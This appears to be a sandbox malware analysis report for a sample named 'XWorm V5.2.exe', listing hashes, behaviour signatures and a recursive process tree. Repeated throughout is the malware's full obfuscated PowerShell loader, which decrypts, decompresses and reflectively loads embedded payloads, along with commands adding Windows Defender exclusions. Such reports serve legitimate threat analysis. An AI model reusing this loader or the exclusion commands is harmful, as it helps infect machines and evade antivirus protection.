Analysis

  • max time kernel
    359s
  • max time network
    360s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags
    arch:x64, arch:x86, image:win7-20240704-en, locale:en-us, os:windows7-x64, system
  • submitted
    05-09-2024 00:10

General

  • Target

    XWorm V5.2.exe

  • Size

    18.2MB

  • MD5

    bdc4539e8060d4db24a69db716a1cec0

  • SHA1

    71c2485bf1684e73f16a213568efcaa2cb88ce6f

  • SHA256

    c39cc9aaa0311fd1f6d981e995b608b0d36e464aea09896bd17b41bbd3fc1fe6

  • SHA512

    b2411923cf5c2e4f96682f73234c409eca38b1712413ec946b1d652a4ddc266376eebe02fd6878dc3fc379eff1307f09407bc06db576c462ded08a839087eb4f

  • SSDEEP

    393216:s+gzSUAx9phaAUnQeGUPG/uVeZ/K2B1CkcDUDLHK18as0mcvow+Ax:1CwUAQQLIG/5//CFU/qO0T

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 11 IoCs

    Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 22 IoCs
  • Suspicious use of AdjustPrivilegeToken 22 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe
    "C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2820
    • C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe
      "C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2596
      • C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe
        "C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2604
        • C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe
          "C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1120
          • C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe
            "C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2488
            • C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe
              "C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"
              6⤵
                PID:1412
                • C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe
                  "C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"
                  7⤵
                    PID:2940
                    • C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe
                      "C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"
                      8⤵
                        PID:2276
                        • C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe
                          "C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"
                          9⤵
                            PID:2284
                            • C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe
                              "C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"
                              10⤵
                                PID:1228
                                • C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe
                                  "C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"
                                  11⤵
                                    PID:1032
                                    • C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe
                                      "C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"
                                      12⤵
                                        PID:328
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat'
                                        12⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2508
                                      • C:\Windows\system32\cmd.exe
                                        cmd /c ""C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat" "
                                        12⤵
                                          PID:2760
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ht0j9zPSqBi69tTX5kflrnUeoIA5im8gLLZnexTvmMs='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yPdScja9U8RjkyeOpTlzgQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gScxN=New-Object System.IO.MemoryStream(,$param_var); $drTXw=New-Object System.IO.MemoryStream; $JmztZ=New-Object System.IO.Compression.GZipStream($gScxN, [IO.Compression.CompressionMode]::Decompress); $JmztZ.CopyTo($drTXw); $JmztZ.Dispose(); $gScxN.Dispose(); $drTXw.Dispose(); $drTXw.ToArray();}function execute_function($param_var,$param2_var){ $BTSMq=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tsXTL=$BTSMq.EntryPoint; $tsXTL.Invoke($null, $param2_var);}$sQwMN = 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat';$host.UI.RawUI.WindowTitle = $sQwMN;$CexYw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($sQwMN).Split([Environment]::NewLine);foreach ($JUrKH in $CexYw) { if ($JUrKH.StartsWith('sgymnEOEMpmtiRUpGEhO')) { $hWNDm=$JUrKH.Substring(20); break; }}$payloads_var=[string[]]$hWNDm.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                                            13⤵
                                              PID:2780
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                                              13⤵
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:2592
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat'
                                          11⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1628
                                        • C:\Windows\system32\cmd.exe
                                          cmd /c ""C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat" "
                                          11⤵
                                            PID:1532
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ht0j9zPSqBi69tTX5kflrnUeoIA5im8gLLZnexTvmMs='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yPdScja9U8RjkyeOpTlzgQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gScxN=New-Object System.IO.MemoryStream(,$param_var); $drTXw=New-Object System.IO.MemoryStream; $JmztZ=New-Object System.IO.Compression.GZipStream($gScxN, [IO.Compression.CompressionMode]::Decompress); $JmztZ.CopyTo($drTXw); $JmztZ.Dispose(); $gScxN.Dispose(); $drTXw.Dispose(); $drTXw.ToArray();}function execute_function($param_var,$param2_var){ $BTSMq=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tsXTL=$BTSMq.EntryPoint; $tsXTL.Invoke($null, $param2_var);}$sQwMN = 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat';$host.UI.RawUI.WindowTitle = $sQwMN;$CexYw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($sQwMN).Split([Environment]::NewLine);foreach ($JUrKH in $CexYw) { if ($JUrKH.StartsWith('sgymnEOEMpmtiRUpGEhO')) { $hWNDm=$JUrKH.Substring(20); break; }}$payloads_var=[string[]]$hWNDm.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                                              12⤵
                                                PID:2388
                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                                                12⤵
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2472
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat'
                                            10⤵
                                            • Command and Scripting Interpreter: PowerShell
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:2764
                                          • C:\Windows\system32\cmd.exe
                                            cmd /c ""C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat" "
                                            10⤵
                                              PID:2460
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ht0j9zPSqBi69tTX5kflrnUeoIA5im8gLLZnexTvmMs='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yPdScja9U8RjkyeOpTlzgQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gScxN=New-Object System.IO.MemoryStream(,$param_var); $drTXw=New-Object System.IO.MemoryStream; $JmztZ=New-Object System.IO.Compression.GZipStream($gScxN, [IO.Compression.CompressionMode]::Decompress); $JmztZ.CopyTo($drTXw); $JmztZ.Dispose(); $gScxN.Dispose(); $drTXw.Dispose(); $drTXw.ToArray();}function execute_function($param_var,$param2_var){ $BTSMq=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tsXTL=$BTSMq.EntryPoint; $tsXTL.Invoke($null, $param2_var);}$sQwMN = 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat';$host.UI.RawUI.WindowTitle = $sQwMN;$CexYw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($sQwMN).Split([Environment]::NewLine);foreach ($JUrKH in $CexYw) { if ($JUrKH.StartsWith('sgymnEOEMpmtiRUpGEhO')) { $hWNDm=$JUrKH.Substring(20); break; }}$payloads_var=[string[]]$hWNDm.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                                                11⤵
                                                  PID:1952
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                                                  11⤵
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:2464
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat'
                                              9⤵
                                              • Command and Scripting Interpreter: PowerShell
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:2092
                                            • C:\Windows\system32\cmd.exe
                                              cmd /c ""C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat" "
                                              9⤵
                                                PID:1804
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ht0j9zPSqBi69tTX5kflrnUeoIA5im8gLLZnexTvmMs='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yPdScja9U8RjkyeOpTlzgQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gScxN=New-Object System.IO.MemoryStream(,$param_var); $drTXw=New-Object System.IO.MemoryStream; $JmztZ=New-Object System.IO.Compression.GZipStream($gScxN, [IO.Compression.CompressionMode]::Decompress); $JmztZ.CopyTo($drTXw); $JmztZ.Dispose(); $gScxN.Dispose(); $drTXw.Dispose(); $drTXw.ToArray();}function execute_function($param_var,$param2_var){ $BTSMq=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tsXTL=$BTSMq.EntryPoint; $tsXTL.Invoke($null, $param2_var);}$sQwMN = 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat';$host.UI.RawUI.WindowTitle = $sQwMN;$CexYw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($sQwMN).Split([Environment]::NewLine);foreach ($JUrKH in $CexYw) { if ($JUrKH.StartsWith('sgymnEOEMpmtiRUpGEhO')) { $hWNDm=$JUrKH.Substring(20); break; }}$payloads_var=[string[]]$hWNDm.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                                                  10⤵
                                                    PID:2340
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                                                    10⤵
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:1660
                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat'
                                                8⤵
                                                • Command and Scripting Interpreter: PowerShell
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2364
                                              • C:\Windows\system32\cmd.exe
                                                cmd /c ""C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat" "
                                                8⤵
                                                  PID:2912
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ht0j9zPSqBi69tTX5kflrnUeoIA5im8gLLZnexTvmMs='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yPdScja9U8RjkyeOpTlzgQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gScxN=New-Object System.IO.MemoryStream(,$param_var); $drTXw=New-Object System.IO.MemoryStream; $JmztZ=New-Object System.IO.Compression.GZipStream($gScxN, [IO.Compression.CompressionMode]::Decompress); $JmztZ.CopyTo($drTXw); $JmztZ.Dispose(); $gScxN.Dispose(); $drTXw.Dispose(); $drTXw.ToArray();}function execute_function($param_var,$param2_var){ $BTSMq=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tsXTL=$BTSMq.EntryPoint; $tsXTL.Invoke($null, $param2_var);}$sQwMN = 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat';$host.UI.RawUI.WindowTitle = $sQwMN;$CexYw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($sQwMN).Split([Environment]::NewLine);foreach ($JUrKH in $CexYw) { if ($JUrKH.StartsWith('sgymnEOEMpmtiRUpGEhO')) { $hWNDm=$JUrKH.Substring(20); break; }}$payloads_var=[string[]]$hWNDm.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                                                    9⤵
                                                      PID:2744
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                                                      9⤵
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:2692
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat'
                                                  7⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:2040
                                                • C:\Windows\system32\cmd.exe
                                                  cmd /c ""C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat" "
                                                  7⤵
                                                    PID:1828
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ht0j9zPSqBi69tTX5kflrnUeoIA5im8gLLZnexTvmMs='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yPdScja9U8RjkyeOpTlzgQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gScxN=New-Object System.IO.MemoryStream(,$param_var); $drTXw=New-Object System.IO.MemoryStream; $JmztZ=New-Object System.IO.Compression.GZipStream($gScxN, [IO.Compression.CompressionMode]::Decompress); $JmztZ.CopyTo($drTXw); $JmztZ.Dispose(); $gScxN.Dispose(); $drTXw.Dispose(); $drTXw.ToArray();}function execute_function($param_var,$param2_var){ $BTSMq=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tsXTL=$BTSMq.EntryPoint; $tsXTL.Invoke($null, $param2_var);}$sQwMN = 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat';$host.UI.RawUI.WindowTitle = $sQwMN;$CexYw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($sQwMN).Split([Environment]::NewLine);foreach ($JUrKH in $CexYw) { if ($JUrKH.StartsWith('sgymnEOEMpmtiRUpGEhO')) { $hWNDm=$JUrKH.Substring(20); break; }}$payloads_var=[string[]]$hWNDm.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                                                      8⤵
                                                        PID:2804
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                                                        8⤵
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:2400
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat'
                                                    6⤵
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:948
                                                  • C:\Windows\system32\cmd.exe
                                                    cmd /c ""C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat" "
                                                    6⤵
                                                      PID:1060
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ht0j9zPSqBi69tTX5kflrnUeoIA5im8gLLZnexTvmMs='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yPdScja9U8RjkyeOpTlzgQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gScxN=New-Object System.IO.MemoryStream(,$param_var); $drTXw=New-Object System.IO.MemoryStream; $JmztZ=New-Object System.IO.Compression.GZipStream($gScxN, [IO.Compression.CompressionMode]::Decompress); $JmztZ.CopyTo($drTXw); $JmztZ.Dispose(); $gScxN.Dispose(); $drTXw.Dispose(); $drTXw.ToArray();}function execute_function($param_var,$param2_var){ $BTSMq=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tsXTL=$BTSMq.EntryPoint; $tsXTL.Invoke($null, $param2_var);}$sQwMN = 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat';$host.UI.RawUI.WindowTitle = $sQwMN;$CexYw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($sQwMN).Split([Environment]::NewLine);foreach ($JUrKH in $CexYw) { if ($JUrKH.StartsWith('sgymnEOEMpmtiRUpGEhO')) { $hWNDm=$JUrKH.Substring(20); break; }}$payloads_var=[string[]]$hWNDm.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                                                        7⤵
                                                          PID:1712
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                                                          7⤵
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:1704
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat'
                                                      5⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:2328
                                                    • C:\Windows\system32\cmd.exe
                                                      cmd /c ""C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat" "
                                                      5⤵
                                                      • Suspicious use of WriteProcessMemory
                                                      PID:1288
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ht0j9zPSqBi69tTX5kflrnUeoIA5im8gLLZnexTvmMs='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yPdScja9U8RjkyeOpTlzgQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gScxN=New-Object System.IO.MemoryStream(,$param_var); $drTXw=New-Object System.IO.MemoryStream; $JmztZ=New-Object System.IO.Compression.GZipStream($gScxN, [IO.Compression.CompressionMode]::Decompress); $JmztZ.CopyTo($drTXw); $JmztZ.Dispose(); $gScxN.Dispose(); $drTXw.Dispose(); $drTXw.ToArray();}function execute_function($param_var,$param2_var){ $BTSMq=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tsXTL=$BTSMq.EntryPoint; $tsXTL.Invoke($null, $param2_var);}$sQwMN = 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat';$host.UI.RawUI.WindowTitle = $sQwMN;$CexYw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($sQwMN).Split([Environment]::NewLine);foreach ($JUrKH in $CexYw) { if ($JUrKH.StartsWith('sgymnEOEMpmtiRUpGEhO')) { $hWNDm=$JUrKH.Substring(20); break; }}$payloads_var=[string[]]$hWNDm.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                                                        6⤵
                                                          PID:1716
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                                                          6⤵
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:868
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat'
                                                      4⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:1728
                                                    • C:\Windows\system32\cmd.exe
                                                      cmd /c ""C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat" "
                                                      4⤵
                                                      • Suspicious use of WriteProcessMemory
                                                      PID:2056
                                                      • C:\Windows\system32\cmd.exe
